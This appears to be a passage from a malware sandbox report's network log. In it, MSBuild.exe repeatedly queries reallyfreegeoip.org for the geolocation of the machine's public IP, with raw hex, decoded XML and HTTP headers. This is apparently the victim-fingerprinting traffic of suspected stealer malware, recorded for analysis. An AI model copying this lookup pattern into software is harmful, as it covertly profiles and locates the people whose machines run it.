                                              Host: reallyfreegeoip.org
                                              2024-11-06 16:02:54 UTC1219INHTTP/1.1 200 OK
                                              Date: Wed, 06 Nov 2024 16:02:54 GMT
                                              Content-Type: text/xml
                                              Content-Length: 359
                                              Connection: close
                                              x-amzn-requestid: f82078ca-afc9-49d9-a069-17b9c217bb0b
                                              x-amzn-trace-id: Root=1-672afe19-4f30f76b7a34a0f953191245;Parent=529078be23d2486a;Sampled=0;Lineage=1:fc9e8231:0
                                              x-cache: Miss from cloudfront
                                              via: 1.1 e316b59dcccd0d0a0f7515e0735beb68.cloudfront.net (CloudFront)
                                              x-amz-cf-pop: DFW57-P5
                                              x-amz-cf-id: -Swr5qbOQdl3bj7Oc7hw3i50AA3lkZIDYOLYOADaQcjijlUp1iiPRA==
                                              Cache-Control: max-age=31536000
                                              CF-Cache-Status: HIT
                                              Age: 38165
                                              Last-Modified: Wed, 06 Nov 2024 05:26:49 GMT
                                              Accept-Ranges: bytes
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lYd2fTDPOd0rQEdOOftOrqwnfyW9Myfm6bhtYzRq9EZuusMBIyCs5A7n2NAgzcRg2jeU2Un4luQyX%2BjWveM%2BA0wTecqyxj52FYiINy1NSdVl5uFAV7Flvc%2Bu%2F9EGgez9Xa0XmLcp"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8de64f842bd86b82-DFW
                                              alt-svc: h3=":443"; ma=86400
                                              server-timing: cfL4;desc="?proto=TCP&rtt=1794&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=1583378&cwnd=251&unsent_bytes=0&cid=9e57791ae0574912&ts=164&x=0"
                                              2024-11-06 16:02:54 UTC150INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65
                                              Data Ascii: <Response><IP>173.254.250.80</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName
                                              2024-11-06 16:02:54 UTC209INData Raw: 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a
                                              Data Ascii: >Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              10192.168.2.656898188.114.96.34437200C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                              TimestampBytes transferredDirectionData
                                              2024-11-06 16:02:55 UTC87OUTGET /xml/173.254.250.80 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              Connection: Keep-Alive
                                              2024-11-06 16:02:55 UTC1219INHTTP/1.1 200 OK
                                              Date: Wed, 06 Nov 2024 16:02:55 GMT
                                              Content-Type: text/xml
                                              Content-Length: 359
                                              Connection: close
                                              x-amzn-requestid: f82078ca-afc9-49d9-a069-17b9c217bb0b
                                              x-amzn-trace-id: Root=1-672afe19-4f30f76b7a34a0f953191245;Parent=529078be23d2486a;Sampled=0;Lineage=1:fc9e8231:0
                                              x-cache: Miss from cloudfront
                                              via: 1.1 e316b59dcccd0d0a0f7515e0735beb68.cloudfront.net (CloudFront)
                                              x-amz-cf-pop: DFW57-P5
                                              x-amz-cf-id: -Swr5qbOQdl3bj7Oc7hw3i50AA3lkZIDYOLYOADaQcjijlUp1iiPRA==
                                              Cache-Control: max-age=31536000
                                              CF-Cache-Status: HIT
                                              Age: 38166
                                              Last-Modified: Wed, 06 Nov 2024 05:26:49 GMT
                                              Accept-Ranges: bytes
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8VV06aCY%2BcHhde0kCy9OT0i%2FWmfwrT4UpgAcjSCZ7nkUq2lAzEOs7iC6Zm6RzuffeBVkefDgGVw2Zb6MN2JUEA7ZKA4LoCGc6RIAoa%2FvhCFg5EiLLvUsHRsmWrZYP2MZhiT5%2BdYH"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8de64f8a2db46b7c-DFW
                                              alt-svc: h3=":443"; ma=86400
                                              server-timing: cfL4;desc="?proto=TCP&rtt=1095&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2567375&cwnd=247&unsent_bytes=0&cid=01af1006541b7188&ts=172&x=0"
                                              2024-11-06 16:02:55 UTC150INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65
                                              Data Ascii: <Response><IP>173.254.250.80</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName
                                              2024-11-06 16:02:55 UTC209INData Raw: 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a
                                              Data Ascii: >Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              11192.168.2.656904188.114.96.34437636C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                              TimestampBytes transferredDirectionData
                                              2024-11-06 16:02:56 UTC87OUTGET /xml/173.254.250.80 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              Connection: Keep-Alive
                                              2024-11-06 16:02:56 UTC1221INHTTP/1.1 200 OK
                                              Date: Wed, 06 Nov 2024 16:02:56 GMT
                                              Content-Type: text/xml
                                              Content-Length: 359
                                              Connection: close
                                              x-amzn-requestid: 68d8c802-f830-4d99-b22d-aa66a416d868
                                              x-amzn-trace-id: Root=1-672b818e-3fe698b34e09e04b5ebcaf79;Parent=0b99835eeee52a0d;Sampled=0;Lineage=1:fc9e8231:0
                                              x-cache: Miss from cloudfront
                                              via: 1.1 f923e65cfb5d73f11ea9a89d42fad5fc.cloudfront.net (CloudFront)
                                              x-amz-cf-pop: DEN52-C1
                                              x-amz-cf-id: VAMjkjwUr0TN8uZkoUg74pQ78zDtUU3uyR1s9VYeqs4wXz8gbpFGsw==
                                              Cache-Control: max-age=31536000
                                              CF-Cache-Status: HIT
                                              Age: 4514
                                              Last-Modified: Wed, 06 Nov 2024 14:47:42 GMT
                                              Accept-Ranges: bytes
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=03hE%2Fgf0R6pDhTeVgL9HCbEmdJmR5xwDpZwcqyZxWbPbTLTxtgSFnAOIId3hcLk2kLH33rjirIPKum5o7rutglHW4Kb56jO%2BumlEHfVs6%2BD%2FQXd4aG7kKK19%2F2eLoSRmLJxB%2BKjY"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8de64f8e9e66e763-DEN
                                              alt-svc: h3=":443"; ma=86400
                                              server-timing: cfL4;desc="?proto=TCP&rtt=18726&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=153788&cwnd=32&unsent_bytes=0&cid=3ba9a45b40742297&ts=167&x=0"
                                              2024-11-06 16:02:56 UTC148INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61
                                              Data Ascii: <Response><IP>173.254.250.80</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionNa
                                              2024-11-06 16:02:56 UTC211INData Raw: 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a
                                              Data Ascii: me>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              12192.168.2.656911188.114.96.34437200C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                              TimestampBytes transferredDirectionData
                                              2024-11-06 16:02:57 UTC87OUTGET /xml/173.254.250.80 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              Connection: Keep-Alive
                                              2024-11-06 16:02:57 UTC1215INHTTP/1.1 200 OK
                                              Date: Wed, 06 Nov 2024 16:02:57 GMT
                                              Content-Type: text/xml
                                              Content-Length: 359
                                              Connection: close
                                              x-amzn-requestid: f82078ca-afc9-49d9-a069-17b9c217bb0b
                                              x-amzn-trace-id: Root=1-672afe19-4f30f76b7a34a0f953191245;Parent=529078be23d2486a;Sampled=0;Lineage=1:fc9e8231:0
                                              x-cache: Miss from cloudfront
                                              via: 1.1 e316b59dcccd0d0a0f7515e0735beb68.cloudfront.net (CloudFront)
                                              x-amz-cf-pop: DFW57-P5
                                              x-amz-cf-id: -Swr5qbOQdl3bj7Oc7hw3i50AA3lkZIDYOLYOADaQcjijlUp1iiPRA==
                                              Cache-Control: max-age=31536000
                                              CF-Cache-Status: HIT
                                              Age: 38168
                                              Last-Modified: Wed, 06 Nov 2024 05:26:49 GMT
                                              Accept-Ranges: bytes
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NevTZt1yIl5pQiU%2FxIwRWtoFBjRp4HW2QtYVh4EgQMd%2BdurgbJcPxXFucJrvBDbxJgXrvXz8TtvKwriS8SvmlrcZx3rdJYfcm1DJ5VlFcxiTIFl66bkhl8foKjfPuIhHimdZWeFy"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8de64f964bab6b13-DFW
                                              alt-svc: h3=":443"; ma=86400
                                              server-timing: cfL4;desc="?proto=TCP&rtt=1209&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2450084&cwnd=251&unsent_bytes=0&cid=50bef6b582323d09&ts=450&x=0"
                                              2024-11-06 16:02:57 UTC154INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78
                                              Data Ascii: <Response><IP>173.254.250.80</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Tex
                                              2024-11-06 16:02:57 UTC205INData Raw: 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a
                                              Data Ascii: as</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              13192.168.2.656914188.114.96.34437636C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                              TimestampBytes transferredDirectionData
                                              2024-11-06 16:02:58 UTC63OUTGET /xml/173.254.250.80 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              2024-11-06 16:02:58 UTC1223INHTTP/1.1 200 OK
                                              Date: Wed, 06 Nov 2024 16:02:58 GMT
                                              Content-Type: text/xml
                                              Content-Length: 359
                                              Connection: close
                                              x-amzn-requestid: f82078ca-afc9-49d9-a069-17b9c217bb0b
                                              x-amzn-trace-id: Root=1-672afe19-4f30f76b7a34a0f953191245;Parent=529078be23d2486a;Sampled=0;Lineage=1:fc9e8231:0
                                              x-cache: Miss from cloudfront
                                              via: 1.1 e316b59dcccd0d0a0f7515e0735beb68.cloudfront.net (CloudFront)
                                              x-amz-cf-pop: DFW57-P5
                                              x-amz-cf-id: -Swr5qbOQdl3bj7Oc7hw3i50AA3lkZIDYOLYOADaQcjijlUp1iiPRA==
                                              Cache-Control: max-age=31536000
                                              CF-Cache-Status: HIT
                                              Age: 38169
                                              Last-Modified: Wed, 06 Nov 2024 05:26:49 GMT
                                              Accept-Ranges: bytes
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1VJ97E5s2gmX4xqpKwHhW%2BXxaQIo40IJuYaTCBu3QIIxmve53Q7T%2BETWqYXUnp0gcm%2FJ7a5kgHnFKoxIOtqyUCWXw3kXktjp7vHxcXCbPsY%2BUy6C6AgH%2BgHSX9xfwiv%2B5LhsBkeu"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8de64f9a4a0ee8ed-DFW
                                              alt-svc: h3=":443"; ma=86400
                                              server-timing: cfL4;desc="?proto=TCP&rtt=1450&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=701&delivery_rate=2002766&cwnd=233&unsent_bytes=0&cid=dc67e14c0597aa08&ts=184&x=0"
                                              2024-11-06 16:02:58 UTC146INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e
                                              Data Ascii: <Response><IP>173.254.250.80</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><Region
                                              2024-11-06 16:02:58 UTC213INData Raw: 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a
                                              Data Ascii: Name>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              14192.168.2.656923188.114.96.34437636C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                              TimestampBytes transferredDirectionData
                                              2024-11-06 16:02:59 UTC87OUTGET /xml/173.254.250.80 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              Connection: Keep-Alive
                                              2024-11-06 16:03:00 UTC1213INHTTP/1.1 200 OK
                                              Date: Wed, 06 Nov 2024 16:02:59 GMT
                                              Content-Type: text/xml
                                              Content-Length: 359
                                              Connection: close
                                              x-amzn-requestid: 68d8c802-f830-4d99-b22d-aa66a416d868
                                              x-amzn-trace-id: Root=1-672b818e-3fe698b34e09e04b5ebcaf79;Parent=0b99835eeee52a0d;Sampled=0;Lineage=1:fc9e8231:0
                                              x-cache: Miss from cloudfront
                                              via: 1.1 f923e65cfb5d73f11ea9a89d42fad5fc.cloudfront.net (CloudFront)
                                              x-amz-cf-pop: DEN52-C1
                                              x-amz-cf-id: VAMjkjwUr0TN8uZkoUg74pQ78zDtUU3uyR1s9VYeqs4wXz8gbpFGsw==
                                              Cache-Control: max-age=31536000
                                              CF-Cache-Status: HIT
                                              Age: 4517
                                              Last-Modified: Wed, 06 Nov 2024 14:47:42 GMT
                                              Accept-Ranges: bytes
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=afS8NfmH1Re1vMJfZdmjeOq6xfKJTwtjqiPcQuvKgawwluxxphet%2BA95KHb9shq64OYNjkuafdxL4zg3HLXYssoApvI5CGzNitxTdd8E50Xt3UuRCltsbNPYDUX6VFDJ6Fpfh2S%2F"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8de64fa4db1de775-DEN
                                              alt-svc: h3=":443"; ma=86400
                                              server-timing: cfL4;desc="?proto=TCP&rtt=19175&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=150168&cwnd=32&unsent_bytes=0&cid=f77096de4ad0a8b9&ts=167&x=0"
                                              2024-11-06 16:03:00 UTC156INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73
                                              Data Ascii: <Response><IP>173.254.250.80</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas
                                              2024-11-06 16:03:00 UTC203INData Raw: 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a
                                              Data Ascii: </RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              15192.168.2.656931188.114.96.34437636C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                              TimestampBytes transferredDirectionData
                                              2024-11-06 16:03:01 UTC63OUTGET /xml/173.254.250.80 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              2024-11-06 16:03:01 UTC1219INHTTP/1.1 200 OK
                                              Date: Wed, 06 Nov 2024 16:03:01 GMT
                                              Content-Type: text/xml
                                              Content-Length: 359
                                              Connection: close
                                              x-amzn-requestid: f82078ca-afc9-49d9-a069-17b9c217bb0b
                                              x-amzn-trace-id: Root=1-672afe19-4f30f76b7a34a0f953191245;Parent=529078be23d2486a;Sampled=0;Lineage=1:fc9e8231:0
                                              x-cache: Miss from cloudfront
                                              via: 1.1 e316b59dcccd0d0a0f7515e0735beb68.cloudfront.net (CloudFront)
                                              x-amz-cf-pop: DFW57-P5
                                              x-amz-cf-id: -Swr5qbOQdl3bj7Oc7hw3i50AA3lkZIDYOLYOADaQcjijlUp1iiPRA==
                                              Cache-Control: max-age=31536000
                                              CF-Cache-Status: HIT
                                              Age: 38172
                                              Last-Modified: Wed, 06 Nov 2024 05:26:49 GMT
                                              Accept-Ranges: bytes
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rUm468hKXNi329Wjrq8YiAToG7gSd6zIk3snqSFEpyNIyW%2Bbrvc3TbVlMTrKYnUa0O%2F6pvBtdqyg29X9zOuAimx5mknNaMcYa5WQW%2Fcikacm%2F2fzgilQJ9W8SRqGf7Il37kXEsM9"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8de64faf2ba62845-DFW
                                              alt-svc: h3=":443"; ma=86400
                                              server-timing: cfL4;desc="?proto=TCP&rtt=1409&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=1892810&cwnd=251&unsent_bytes=0&cid=d815b20762d9c5e5&ts=182&x=0"
                                              2024-11-06 16:03:01 UTC150INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65
                                              Data Ascii: <Response><IP>173.254.250.80</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName
